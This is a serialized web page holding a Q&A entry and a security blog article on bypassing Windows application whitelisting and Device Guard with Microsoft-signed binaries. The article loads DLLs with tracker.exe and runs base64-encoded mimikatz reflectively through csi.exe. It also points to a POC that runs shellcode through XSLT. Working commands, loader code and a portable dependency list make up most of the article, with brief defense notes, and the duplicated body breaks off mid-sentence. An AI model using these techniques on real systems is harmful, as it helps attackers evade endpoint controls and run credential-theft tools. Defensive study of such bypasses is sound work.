[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fAB4CMGnuN-GhHadSpxn7W1bz-Sydw6dqEud40ryYfc0":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":52,"_status":50},257,"How can I use tracker.exe to load a DLL and bypass application whitelisting?","tracker.exe, a Microsoft-signed binary from the Windows SDK, can load a DLL into any process you start using the `\u002Fd` option. For example, `Tracker.exe \u002Fd test.dll \u002Fc cmd.exe` injects test.dll into cmd.exe. Because tracker.exe is digitally signed, it can bypass application whitelisting controls. However, if the target process exits quickly, as with svchost.exe, the DLL still gets loaded. See the full details in [Study Notes Weekly No.4](\u002Fnews\u002Fstudy-notes-weekly-no-4-use-tracker-to-load-dll-use-csi-to-bypass-umci-execute-c-from-xslt-file).","\u003Cp>tracker.exe, a Microsoft-signed binary from the Windows SDK, can load a DLL into any process you start using the `\u002Fd` option. For example, `Tracker.exe \u002Fd test.dll \u002Fc cmd.exe` injects test.dll into cmd.exe. Because tracker.exe is digitally signed, it can bypass application whitelisting controls. However, if the target process exits quickly, as with svchost.exe, the DLL still gets loaded. See the full details in [Study Notes Weekly No.4](\u002Fnews\u002Fstudy-notes-weekly-no-4-use-tracker-to-load-dll-use-csi-to-bypass-umci-execute-c-from-xslt-file).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fstudy-notes-weekly-no-4-use-tracker-to-load-dll-use-csi-to-bypass-umci-execute-c-from-xslt-file\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-i-use-trackerexe-to-load-a-dll-and-bypass-application-whitelisting-1777484349836","tracker.exe, DLL injection, application whitelisting bypass, Microsoft signed binary",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},67,"Study Notes Weekly No.4(Use tracker to load dll & Use csi to bypass UMCI & Execute C# from XSLT file)","study-notes-weekly-no-4-use-tracker-to-load-dll-use-csi-to-bypass-umci-execute-c-from-xslt-file","Learn to bypass Windows Device Guard using tracker.exe to load DLLs and csi.exe for application whitelisting bypass. Includes executing C# from XSLT files.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Cp>\u003Cstrong>About:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>use tracker to load dll\u003C\u002Fli>\u003Cli>use csi to bypass Application Whitelisting\u003C\u002Fli>\u003Cli>execute C# from XSLT file\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Contents:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to using tracker.exe to load dll\u003C\u002Fli>\u003Cli>How to use csi.exe to bypass Windows Device Guard\u003C\u002Fli>\u003Cli>Executing C# code during XSLT file transformation\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x01 use tracker to load dll\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Reference:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002FsubTee\u002Fstatus\u002F793151392185589760\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018755786_0_ece66fab8f.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Introduction:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>A technique shared by Casey on Twitter involves using tracker.exe to create a process and inject a DLL. Notably, tracker.exe comes from the SDK and includes Microsoft's digital signature. This article will share some insights on leveraging this technique, along with an additional tip for directly using tracker.exe to load a DLL.\u003C\u002Fp>\u003Cp>\u003Cstrong>Tracker.exe:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Tracker.exe is used to start a process and inject FileTracker.dll into it just after creation.\u003C\u002Fp>\u003Cp>The file accesses of the target process are tracked, and written to a .tlog file\u003C\u002Fp>\u003Cp>Common directories (requires SDK installation):\u003C\u002Fp>\u003Cul>\u003Cli>C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v8.1A\\bin\\NETFX 4.5.1 Tools\u003C\u002Fli>\u003Cli>C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v10.0A\\bin\\NETFX 4.6.1 Tools\\x64\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Syntax:\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Tracker.exe [options] [@tracker response file] \u002Fc [command line]\u003Cbr>\u003Cbr> \u002Fd file.dll                : Start the process with the tracking DLL file.dll. (Default: FileTracker.dll provided via PATH)\u003Cbr>\u003Cbr> \u002Fi[f] \u003Cpath>               : Intermediate directory for tracking log output. (Use \u002Fif to immediately expand the path to a full path) (Default: Current directory in the tracked process)\u003Cbr>\u003Cbr> \u002Fo                         : Perform tracking operations for each file\u003Cbr>\u003Cbr> \u002Fm                         : Include missing files in the tracking log, i.e., those deleted before the process closes\u003Cbr>\u003Cbr> \u002Fu                         : Do not remove duplicate file operations from the tracking log\u003Cbr>\u003Cbr> \u002Ft                         : Track the command line (expand response files specified using the '@filename' syntax)\u003Cbr>\u003Cbr> \u002Fa                         : Enable extended tracing: GetFileAttributes, GetFileAttributesEx\u003Cbr>\u003Cbr> \u002Fe                         : Enable extended tracing: GetFileAttributes, GetFileAttributesEx, RemoveDirectory, CreateDirectory\u003Cbr>\u003Cbr> \u002Fk                         : Keep full toolchain in trace log filenames\u003Cbr>\u003Cbr> \u002Fr file1;file2;..;filen : Primary root input files being traced (default: none)\u003Cbr>\u003Cbr> \u002Fc [command line]         : Command to trace (must be the last parameter)\u003Cbr>\u003Cbr> \u002F?                         : This help text\u003C\u002Fpath>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Actual test:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Run in cmd:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Tracker.exe \u002Fd test.dll \u002Fc cmd.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown, successfully loaded test.dll\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018773425_1_18c7be3d3c.png\">\u003C\u002Fp>\u003Cp>test.dll can be any DLL with default exported functions, sample code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \"stdafx.h\"\u003Cbr>#include \u003Cwindows.h>\u003Cbr>BOOL APIENTRY DllMain( HMODULE hModule,\u003Cbr>                       DWORD  ul_reason_for_call,\u003Cbr>                       LPVOID lpReserved\u003Cbr>           )\u003Cbr>{\u003Cbr>  switch (ul_reason_for_call)\u003Cbr>  {\u003Cbr>  case DLL_PROCESS_ATTACH:\u003Cbr>    MessageBox(NULL,L\"testexport\", L\"testexport\",MB_OK);\u003Cbr>  case DLL_THREAD_ATTACH:\u003Cbr>  case DLL_THREAD_DETACH:\u003Cbr>  case DLL_PROCESS_DETACH:\u003Cbr>    break;\u003Cbr>  }\u003Cbr>  return TRUE;\u003Cbr>}\u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Analysis:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This technique has the following characteristics:\u003C\u002Fp>\u003Cul>\u003Cli>tracker.exe contains a Microsoft digital signature, allowing it to bypass application whitelist restrictions.\u003C\u002Fli>\u003Cli>tracker.exe can load a DLL while starting a process.\u003C\u002Fli>\u003C\u002Ful>\u003Cp>However, if the goal is only to load a DLL via tracker.exe, the following issues exist:\u003C\u002Fp>\u003Cp>Selecting a non-existent or insufficient-permission process will fail to load the DLL.\u003C\u002Fp>\u003Cp>Nevertheless, this problem can be resolved by using a specific process, such as svchost.exe. After loading the DLL, the svchost.exe process can exit automatically, achieving DLL loading via tracker.exe.\u003C\u002Fp>\u003Cp>\u003Cstrong>Defense:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Add tracker.exe to the blacklist rules.\u003C\u002Fp>\u003Ch2>0x02 Use csi to bypass Application Whitelisting\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Reference:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>http:\u002F\u002Fsubt0x10.blogspot.com\u002F2016\u002F09\u002Fapplication-whitelisting-bypass-csiexe.html\u003C\u002Fp>\u003Cp>\u003Cstrong>Introduction:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This technique also leverages a Microsoft-signed executable to bypass whitelisting. Matt Graeber previously described using cdb.exe to bypass Windows Device Guard. Casey introduces a technique using csi.exe, related to C#, to bypass Windows Device Guard. This article shares insights from researching this technique and completes the exercise left by Casey in the blog—how to use csi.exe in a Windows 10 environment without VS2015 installed.\u003C\u002Fp>\u003Cp>\u003Cstrong>csi.exe:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Introduced in Visual Studio 2015 Update 1\u003C\u002Fp>\u003Cp>Installation location after setup: C:\\Program Files (x86)\\MSBuild\\14.0\\Bin\u003C\u002Fp>\u003Cp>\u003Cstrong>Actual testing:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Test system:\u003C\u002Fp>\u003Cp>Win10 with Visual Studio 2015 installed\u003C\u002Fp>\u003Cp>\u003Cstrong>1. Directly execute code in the csi compilation environment\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Running csi.exe directly enters the compilation environment, where code can be directly entered and executed\u003C\u002Fp>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018786924_2_aaeed51b10.png\">\u003C\u002Fp>\u003Cp>Testing Casey's code from the article: reading base64-encrypted mimikatz.exe from a file, decrypting and executing it. The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Reflection;\u003Cbr>string s = System.IO.File.ReadAllText(@\"c:\\\\test\\\\katz.txt\");\u003Cbr>byte[] b = System.Convert.FromBase64String(s);\u003Cbr>Assembly a = Assembly.Load(b);\u003Cbr>MethodInfo method = a.EntryPoint;\u003Cbr>object o = a.CreateInstance(method.Name);\u003Cbr>method.Invoke(o, null);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The file katz.txt containing base64-encoded mimikatz.exe has been uploaded, located at:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.某开源项目.txt\u003C\u002Fp>\u003Cp>Test as shown, successfully decrypted and executed mimikatz.exe\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018799630_3_eefeacf920.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>2. Execute code in .csx file\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Write the above test code in katz.csx file\u003C\u002Fp>\u003Cp>Run in csi compilation environment:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#load \"c:\\\\test\\\\katz.csx\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>File path must be enclosed in double quotes, with # prefix for load\u003C\u002Fp>\u003Cp>Test as shown, successfully executed\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018807740_4_d640640dfb.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>3. Run in cmd\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>You can directly add the path of the .csx file after csi.exe in cmd\u003C\u002Fp>\u003Cp>For example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\"C:\\Program Files (x86)\\MSBuild\\14.0\\Bin\\csi.exe\" c:\\test\\katz.csx\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test as shown, executed successfully\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018815023_5_143f7fa7ad.png\">\u003C\u002Fp>\u003Cp>Of course, on Win10, it is not necessary to install VS2015 to use csi.exe. This is also an assignment left by Casey for readers: find the dependencies required for using csi.exe\u003C\u002Fp>\u003Cp>I have completed this assignment. The minimum required dependency files are 6.77MB and can be found in the same directory as csi.exe at C:\\Program Files (x86)\\MSBuild\\14.0\\Bin. Upload csi.exe and its dependencies to the Win10 system to use it directly\u003C\u002Fp>\u003Cp>The list of dependency files is as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Microsoft.CodeAnalysis.CSharp.dll\u003C\u002Fli>\u003Cli>Microsoft.CodeAnalysis.CSharp.Scripting.dll\u003C\u002Fli>\u003Cli>Microsoft.CodeAnalysis.dll\u003C\u002Fli>\u003Cli>Microsoft.CodeAnalysis.Scripting.dll\u003C\u002Fli>\u003Cli>System.AppContext.dll\u003C\u002Fli>\u003Cli>System.Collections.Immutable.dll\u003C\u002Fli>\u003Cli>System.IO.FileSystem.dll\u003C\u002Fli>\u003Cli>System.IO.FileSystem.Primitives.dll\u003C\u002Fli>\u003Cli>System.Reflection.Metadata.dll\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This method is only for Windows 10\u003C\u002Fp>\u003Cp>\u003Cstrong>Defense:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Matt Graeber shared his mitigation approach, updating Device Guard Bypass MitigationRules, at the following addresses:\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002Fmattifestation\u002Fstatus\u002F781211230065332224\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fmattifestation\u002FDeviceGuardBypassMitigationRules\u002F\u003C\u002Fp>\u003Ch2>0x03 execute C# from XSLT file\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Reference:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002FsubTee\u002Fstatus\u002F796737674954608641\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018822122_6_7c87d39df1.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>POC address:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002FsubTee\u002Fc34d0499e232c1501ff9f0a8dd302cbd#file-script-ps1\u003C\u002Fp>\u003Cp>\u003Cstrong>Introduction:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Casey shared an interesting technique on Twitter about executing C# code during XSLT file transformation. This section will share insights on this technique, expand the POC, and combine it with previous code to achieve shellcode execution via XSLT files.\u003C\u002Fp>\u003Cp>\u003Cstrong>XSLT:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>XSLT stands for Extensible Stylesheet Language Transformation.\u003C\u002Fp>\u003Cp>It is used to convert XML documents into one of the following formats:\u003C\u002Fp>\u003Cul>\u003Cli>HTML\u003C\u002Fli>\u003Cli>XML\u003C\u002Fli>\u003Cli>XHTML\u003C\u002Fli>\u003Cli>XSLT\u003C\u002Fli>\u003Cli>Text\u003C\u002Fli>\u003C\u002Ful>\u003Cp>During the transformation process, C# or VB code can be executed, similar to executing code during compilation in Visual Studio Persistence.\u003C\u002Fp>\u003Cp>XSLT is commonly used in web front-end development.\u003C\u002Fp>\u003Cp>\u003Cstrong>Actual testing:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Place the three files calc.xslt, example.xml, and script.ps1 in the same directory, and set the path variable $path in script.ps1\u003C\u002Fp>\u003Cp>Execute script.ps1 to generate output.xml and launch the calculator, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018826948_7_f4b8d0665a.png\">\u003C\u002Fp>\u003Cp>For more tips on writing XSLT, refer to the following link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fwxaw5z5e(v=vs.110).aspx\u003C\u002Fp>\u003Cp>Based on previous research, we have implemented calling C# to execute shellcode via XSLT. The address is as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Mainly modified the calc.xslt file\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Cp>\u003Cstrong>About:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>use tracker to load dll\u003C\u002Fli>\u003Cli>use csi to bypass Application Whitelisting\u003C\u002Fli>\u003Cli>execute C# from XSLT file\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Contents:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to using tracker.exe to load dll\u003C\u002Fli>\u003Cli>How to use csi.exe to bypass Windows Device Guard\u003C\u002Fli>\u003Cli>Executing C# code during XSLT file transformation\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x01 use tracker to load dll\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Reference:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002FsubTee\u002Fstatus\u002F793151392185589760\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018755786_0_ece66fab8f-1.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Introduction:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>A technique shared by Casey on Twitter involves using tracker.exe to create a process and inject a DLL. Notably, tracker.exe comes from the SDK and includes Microsoft's digital signature. This article will share some insights on leveraging this technique, along with an additional tip for directly using tracker.exe to load a DLL.\u003C\u002Fp>\u003Cp>\u003Cstrong>Tracker.exe:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Tracker.exe is used to start a process and inject FileTracker.dll into it just after creation.\u003C\u002Fp>\u003Cp>The file accesses of the target process are tracked, and written to a .tlog file\u003C\u002Fp>\u003Cp>Common directories (requires SDK installation):\u003C\u002Fp>\u003Cul>\u003Cli>C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v8.1A\\bin\\NETFX 4.5.1 Tools\u003C\u002Fli>\u003Cli>C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v10.0A\\bin\\NETFX 4.6.1 Tools\\x64\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Syntax:\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Tracker.exe [options] [@tracker response file] \u002Fc [command line]\u003Cbr>\u003Cbr> \u002Fd file.dll                : Start the process with the tracking DLL file.dll. (Default: FileTracker.dll provided via PATH)\u003Cbr>\u003Cbr> \u002Fi[f] \u003Cpath>               : Intermediate directory for tracking log output. (Use \u002Fif to immediately expand the path to a full path) (Default: Current directory in the tracked process)\u003Cbr>\u003Cbr> \u002Fo                         : Perform tracking operations for each file\u003Cbr>\u003Cbr> \u002Fm                         : Include missing files in the tracking log, i.e., those deleted before the process closes\u003Cbr>\u003Cbr> \u002Fu                         : Do not remove duplicate file operations from the tracking log\u003Cbr>\u003Cbr> \u002Ft                         : Track the command line (expand response files specified using the '@filename' syntax)\u003Cbr>\u003Cbr> \u002Fa                         : Enable extended tracing: GetFileAttributes, GetFileAttributesEx\u003Cbr>\u003Cbr> \u002Fe                         : Enable extended tracing: GetFileAttributes, GetFileAttributesEx, RemoveDirectory, CreateDirectory\u003Cbr>\u003Cbr> \u002Fk                         : Keep full toolchain in trace log filenames\u003Cbr>\u003Cbr> \u002Fr file1;file2;..;filen : Primary root input files being traced (default: none)\u003Cbr>\u003Cbr> \u002Fc [command line]         : Command to trace (must be the last parameter)\u003Cbr>\u003Cbr> \u002F?                         : This help text\u003C\u002Fpath>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Actual test:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Run in cmd:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Tracker.exe \u002Fd test.dll \u002Fc cmd.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown, successfully loaded test.dll\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018773425_1_18c7be3d3c-1.png\">\u003C\u002Fp>\u003Cp>test.dll can be any DLL with default exported functions, sample code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \"stdafx.h\"\u003Cbr>#include \u003Cwindows.h>\u003Cbr>BOOL APIENTRY DllMain( HMODULE hModule,\u003Cbr>                       DWORD  ul_reason_for_call,\u003Cbr>                       LPVOID lpReserved\u003Cbr>           )\u003Cbr>{\u003Cbr>  switch (ul_reason_for_call)\u003Cbr>  {\u003Cbr>  case DLL_PROCESS_ATTACH:\u003Cbr>    MessageBox(NULL,L\"testexport\", L\"testexport\",MB_OK);\u003Cbr>  case DLL_THREAD_ATTACH:\u003Cbr>  case DLL_THREAD_DETACH:\u003Cbr>  case DLL_PROCESS_DETACH:\u003Cbr>    break;\u003Cbr>  }\u003Cbr>  return TRUE;\u003Cbr>}\u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Analysis:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This technique has the following characteristics:\u003C\u002Fp>\u003Cul>\u003Cli>tracker.exe contains a Microsoft digital signature, allowing it to bypass application whitelist restrictions.\u003C\u002Fli>\u003Cli>tracker.exe can load a DLL while starting a process.\u003C\u002Fli>\u003C\u002Ful>\u003Cp>However, if the goal is only to load a DLL via tracker.exe, the following issues exist:\u003C\u002Fp>\u003Cp>Selecting a non-existent or insufficient-permission process will fail to load the DLL.\u003C\u002Fp>\u003Cp>Nevertheless, this problem can be resolved by using a specific process, such as svchost.exe. After loading the DLL, the svchost.exe process can exit automatically, achieving DLL loading via tracker.exe.\u003C\u002Fp>\u003Cp>\u003Cstrong>Defense:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Add tracker.exe to the blacklist rules.\u003C\u002Fp>\u003Ch2>0x02 Use csi to bypass Application Whitelisting\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Reference:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>http:\u002F\u002Fsubt0x10.blogspot.com\u002F2016\u002F09\u002Fapplication-whitelisting-bypass-csiexe.html\u003C\u002Fp>\u003Cp>\u003Cstrong>Introduction:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This technique also leverages a Microsoft-signed executable to bypass whitelisting. Matt Graeber previously described using cdb.exe to bypass Windows Device Guard. Casey introduces a technique using csi.exe, related to C#, to bypass Windows Device Guard. This article shares insights from researching this technique and completes the exercise left by Casey in the blog—how to use csi.exe in a Windows 10 environment without VS2015 installed.\u003C\u002Fp>\u003Cp>\u003Cstrong>csi.exe:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Introduced in Visual Studio 2015 Update 1\u003C\u002Fp>\u003Cp>Installation location after setup: C:\\Program Files (x86)\\MSBuild\\14.0\\Bin\u003C\u002Fp>\u003Cp>\u003Cstrong>Actual testing:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Test system:\u003C\u002Fp>\u003Cp>Win10 with Visual Studio 2015 installed\u003C\u002Fp>\u003Cp>\u003Cstrong>1. Directly execute code in the csi compilation environment\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Running csi.exe directly enters the compilation environment, where code can be directly entered and executed\u003C\u002Fp>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018786924_2_aaeed51b10-1.png\">\u003C\u002Fp>\u003Cp>Testing Casey's code from the article: reading base64-encrypted mimikatz.exe from a file, decrypting and executing it. The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Reflection;\u003Cbr>string s = System.IO.File.ReadAllText(@\"c:\\\\test\\\\katz.txt\");\u003Cbr>byte[] b = System.Convert.FromBase64String(s);\u003Cbr>Assembly a = Assembly.Load(b);\u003Cbr>MethodInfo method = a.EntryPoint;\u003Cbr>object o = a.CreateInstance(method.Name);\u003Cbr>method.Invoke(o, null);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The file katz.txt containing base64-encoded mimikatz.exe has been uploaded, located at:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.某开源项目.txt\u003C\u002Fp>\u003Cp>Test as shown, successfully decrypted and executed mimikatz.exe\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018799630_3_eefeacf920-1.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>2. Execute code in .csx file\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Write the above test code in katz.csx file\u003C\u002Fp>\u003Cp>Run in csi compilation environment:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#load \"c:\\\\test\\\\katz.csx\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>File path must be enclosed in double quotes, with # prefix for load\u003C\u002Fp>\u003Cp>Test as shown, successfully executed\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018807740_4_d640640dfb-1.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>3. Run in cmd\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>You can directly add the path of the .csx file after csi.exe in cmd\u003C\u002Fp>\u003Cp>For example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\"C:\\Program Files (x86)\\MSBuild\\14.0\\Bin\\csi.exe\" c:\\test\\katz.csx\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test as shown, executed successfully\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018815023_5_143f7fa7ad-1.png\">\u003C\u002Fp>\u003Cp>Of course, on Win10, it is not necessary to install VS2015 to use csi.exe. This is also an assignment left by Casey for readers: find the dependencies required for using csi.exe\u003C\u002Fp>\u003Cp>I have completed this assignment. The minimum required dependency files are 6.77MB and can be found in the same directory as csi.exe at C:\\Program Files (x86)\\MSBuild\\14.0\\Bin. Upload csi.exe and its dependencies to the Win10 system to use it directly\u003C\u002Fp>\u003Cp>The list of dependency files is as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Microsoft.CodeAnalysis.CSharp.dll\u003C\u002Fli>\u003Cli>Microsoft.CodeAnalysis.CSharp.Scripting.dll\u003C\u002Fli>\u003Cli>Microsoft.CodeAnalysis.dll\u003C\u002Fli>\u003Cli>Microsoft.CodeAnalysis.Scripting.dll\u003C\u002Fli>\u003Cli>System.AppContext.dll\u003C\u002Fli>\u003Cli>System.Collections.Immutable.dll\u003C\u002Fli>\u003Cli>System.IO.FileSystem.dll\u003C\u002Fli>\u003Cli>System.IO.FileSystem.Primitives.dll\u003C\u002Fli>\u003Cli>System.Reflection.Metadata.dll\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This method is only for Windows 